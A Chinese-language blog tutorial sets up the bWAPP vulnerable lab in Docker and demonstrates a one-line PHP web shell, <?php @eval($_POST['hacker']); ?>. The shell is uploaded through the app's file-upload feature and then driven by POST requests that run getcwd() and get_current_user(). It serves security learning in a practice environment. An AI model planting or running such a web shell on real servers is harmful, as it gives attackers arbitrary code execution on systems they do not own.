一句話木馬的簡單實現。

1.環境搭建首先安裝Docker Desktop 

  docker啓動依賴於,bios開始虛擬化設置,啓用Hyper-V,

  具體操作步驟 控制面板\所有控制面板項\程序和功能\啓用或關閉Windows功能,勾選Hyper-V,適用於Linux的Windows子系統,重新啓動計算機。

 解決方案B(如果已啓用Hyper-V功能但不起作用)

  使用Hypervisor啓用

 bcdedit /set hypervisorlaunchtype auto

  參考鏈接:https://docs.docker.com/docker-for-windows/troubleshoot/#support     

運行Docker Desktop 命令行拉取鏡像:docker pull registry.cn-shanghai.aliyuncs.com/yhskc/bwapp     運行項目:docker run -d -p 0.0.0.0:80:80 registry.cn-shanghai.aliyuncs.com/yhskc/bwapp 

訪問網址並創建賬號:http://127.0.0.1/install.php

上傳木馬文件

eval函數將接受的字符串當做代碼執行,獲取post請求中hacker字段。

<?php @eval($_POST['hacker']); ?>

 

選擇上傳方式,並點擊圖片下載獲取地址

 

 

圖片地址。

 

通過curl命令發送post請求。

getcwd() 獲取當前路徑

get_current_user() 獲取當前用戶

 

 

 

 

 

 

 

 

                   

                      

        

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章